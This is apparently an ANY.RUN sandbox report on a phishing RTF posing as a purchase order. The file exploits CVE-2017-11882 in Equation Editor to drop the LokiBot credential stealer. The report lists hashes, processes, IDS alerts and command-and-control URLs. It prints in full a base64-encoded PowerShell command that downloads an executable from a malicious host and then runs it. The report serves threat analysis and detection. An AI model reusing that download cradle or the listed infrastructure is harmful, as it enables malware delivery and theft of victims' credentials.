analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

PURCHASE ORDER 201902-M0151.doc

Full analysis: https://app.any.run/tasks/a1bcd35b-c9d4-4c00-9257-a9dfc7605163
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 23, 2019, 09:44:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
exploit
CVE-2017-11882
trojan
loader
lokibot
Indicators:
MIME: text/rtf
File info: Rich Text Format data, unknown version
MD5:

DD83B4826F6829BA442D857669728A98

SHA1:

48A19C1A08358AFF20B8C7F63F85558F6BABB0DD

SHA256:

09EC1DE0445E1887A6368FDD4F3AFA555F37394051327385A59BF61AB3EF836F

SSDEEP:

24:RieoDX1i3oJGMOvzxax9kCIzxVfsdDYTFe+Pa9ya6wnfUTmc0C2N1WBHShyL5:IVDeogzxokbzjEsTlnln2Hw5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1396)
    • Application was dropped or rewritten from another process

      • vnchost.exe (PID: 2356)
      • vnchost.exe (PID: 3736)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2136)
    • LOKIBOT was detected

      • vnchost.exe (PID: 2356)
    • Detected artifacts of LokiBot

      • vnchost.exe (PID: 2356)
    • Connects to CnC server

      • vnchost.exe (PID: 2356)
    • Actions looks like stealing of personal data

      • vnchost.exe (PID: 2356)
  • SUSPICIOUS

    • Reads internet explorer settings

      • EQNEDT32.EXE (PID: 1396)
    • Creates files in the user directory

      • EQNEDT32.EXE (PID: 1396)
      • powershell.exe (PID: 2136)
      • vnchost.exe (PID: 2356)
    • Executes PowerShell scripts

      • EQNEDT32.EXE (PID: 1396)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2136)
      • vnchost.exe (PID: 2356)
    • Application launched itself

      • vnchost.exe (PID: 3736)
    • Loads DLL from Mozilla Firefox

      • vnchost.exe (PID: 2356)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3080)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3080)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 2136)
      • vnchost.exe (PID: 2356)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe powershell.exe cmd.exe no specs vnchost.exe #LOKIBOT vnchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
3080"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PURCHASE ORDER 201902-M0151.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1396"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2136"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwADoALwAvAG0AYQBpAGwALgBmAG0AMwA0ADgALgBiAGgAcwB0AHUAZABlAG4AdABzAC4AbgBlAHQALwBmAGEAcgBhAGgAawB1AG4ALwB3AHAALQBhAGQAbQBpAG4ALwBqAHMALwBtAGsAZAAvAGUAbQBtAGEALgBlAHgAZQAiACwAIgAkAGUAbgB2ADoAdABlAG0AcABcAHYAbgBjAGgAbwBzAHQALgBlAHgAZQAiACkAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3404cmd /c %temp%\vnchost.exeC:\Windows\system32\cmd.exeWmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3736C:\Users\admin\AppData\Local\Temp\vnchost.exeC:\Users\admin\AppData\Local\Temp\vnchost.exe
cmd.exe
User:
admin
Company:
overwhelmer
Integrity Level:
MEDIUM
Description:
malreasoning
Exit code:
0
Version:
3.7.1.8
2356C:\Users\admin\AppData\Local\Temp\vnchost.exeC:\Users\admin\AppData\Local\Temp\vnchost.exe
vnchost.exe
User:
admin
Company:
overwhelmer
Integrity Level:
MEDIUM
Description:
malreasoning
Version:
3.7.1.8
Total events
1 439
Read events
1 014
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
3
Unknown types
4

Dropped files

PID
Process
Filename
Type
3080WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5CB2.tmp.cvr
MD5:
SHA256:
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ARDY4HTV17WZTZZN8EIC.temp
MD5:
SHA256:
2356vnchost.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.lck
MD5:
SHA256:
1396EQNEDT32.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txttext
MD5:2624B7A4BCC1F55975627006936271D5
SHA256:D713251B23356834159743ACEEE3740C95DCD7BC754C1AC6FF71BF088AE30328
2136powershell.exeC:\Users\admin\AppData\Local\Temp\vnchost.exeexecutable
MD5:C971E11C4E39BC455B9944BC5F343211
SHA256:C3E5AC0DF664DA39BA58E69CBEC35558FD3554996D41F000D1D2698CB99BA4A4
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFe7366.TMPbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
2356vnchost.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.exeexecutable
MD5:C971E11C4E39BC455B9944BC5F343211
SHA256:C3E5AC0DF664DA39BA58E69CBEC35558FD3554996D41F000D1D2698CB99BA4A4
2136powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:131DC75F6D4142CA9244945A91A71E8D
SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4
1396EQNEDT32.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\p3sWAyrA[1].txthtml
MD5:30FBD47BA137E118628FEF3C121CBD0D
SHA256:2211C22F9C9CA9AD852234333E480A014CD00C212F83EAFE898F7407E6B07ED7
2356vnchost.exeC:\Users\admin\AppData\Roaming\F63AAA\A71D80.hdbtext
MD5:5302B1B5EC232D44E2D9507FB847FC49
SHA256:20B58A25872B1E3F7D47DAE0C090ACF229C49B6E33939934513499CC37BB2684
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
8
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2136
powershell.exe
GET
200
66.147.244.153:80
http://mail.fm348.bhstudents.net/farahkun/wp-admin/js/mkd/emma.exe
US
executable
354 Kb
malicious
2356
vnchost.exe
POST
404
185.197.74.126:80
http://simbatekhomes.com/~zadmin/lmark/emma/link.php
RU
binary
23 b
malicious
2356
vnchost.exe
POST
404
185.197.74.126:80
http://simbatekhomes.com/~zadmin/lmark/emma/link.php
RU
text
15 b
malicious
2356
vnchost.exe
POST
404
185.197.74.126:80
http://simbatekhomes.com/~zadmin/lmark/emma/link.php
RU
binary
23 b
malicious
2356
vnchost.exe
POST
404
185.197.74.126:80
http://simbatekhomes.com/~zadmin/lmark/emma/link.php
RU
text
15 b
malicious
2356
vnchost.exe
POST
185.189.12.36:80
http://simbatekhomes.com/~zadmin/lmark/emma/link.php
RU
malicious
2356
vnchost.exe
POST
404
193.187.175.219:80
http://simbatekhomes.com/~zadmin/lmark/emma/link.php
unknown
binary
23 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1396
EQNEDT32.EXE
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
2356
vnchost.exe
185.197.74.126:80
simbatekhomes.com
LLC CloudSol
RU
malicious
2136
powershell.exe
66.147.244.153:80
mail.fm348.bhstudents.net
Unified Layer
US
malicious
2356
vnchost.exe
185.189.12.36:80
simbatekhomes.com
MediaServicePlus LLC
RU
malicious
2356
vnchost.exe
193.187.175.219:80
simbatekhomes.com
malicious

DNS requests

Domain
IP
Reputation
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
mail.fm348.bhstudents.net
  • 66.147.244.153
malicious
simbatekhomes.com
  • 185.197.74.126
  • 193.187.175.219
  • 185.189.12.36
malicious

Threats

PID
Process
Class
Message
2136
powershell.exe
A Network Trojan was detected
ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious
2136
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2136
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2136
powershell.exe
Misc activity
ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)
2356
vnchost.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
2356
vnchost.exe
A Network Trojan was detected
ET TROJAN LokiBot Checkin
2356
vnchost.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
2356
vnchost.exe
A Network Trojan was detected
ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
2356
vnchost.exe
A Network Trojan was detected
MALWARE [PTsecurity] Loki Bot Check-in M2
2356
vnchost.exe
A Network Trojan was detected
ET TROJAN LokiBot User-Agent (Charon/Inferno)
Process
Message
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll
vnchost.exe
User32.dll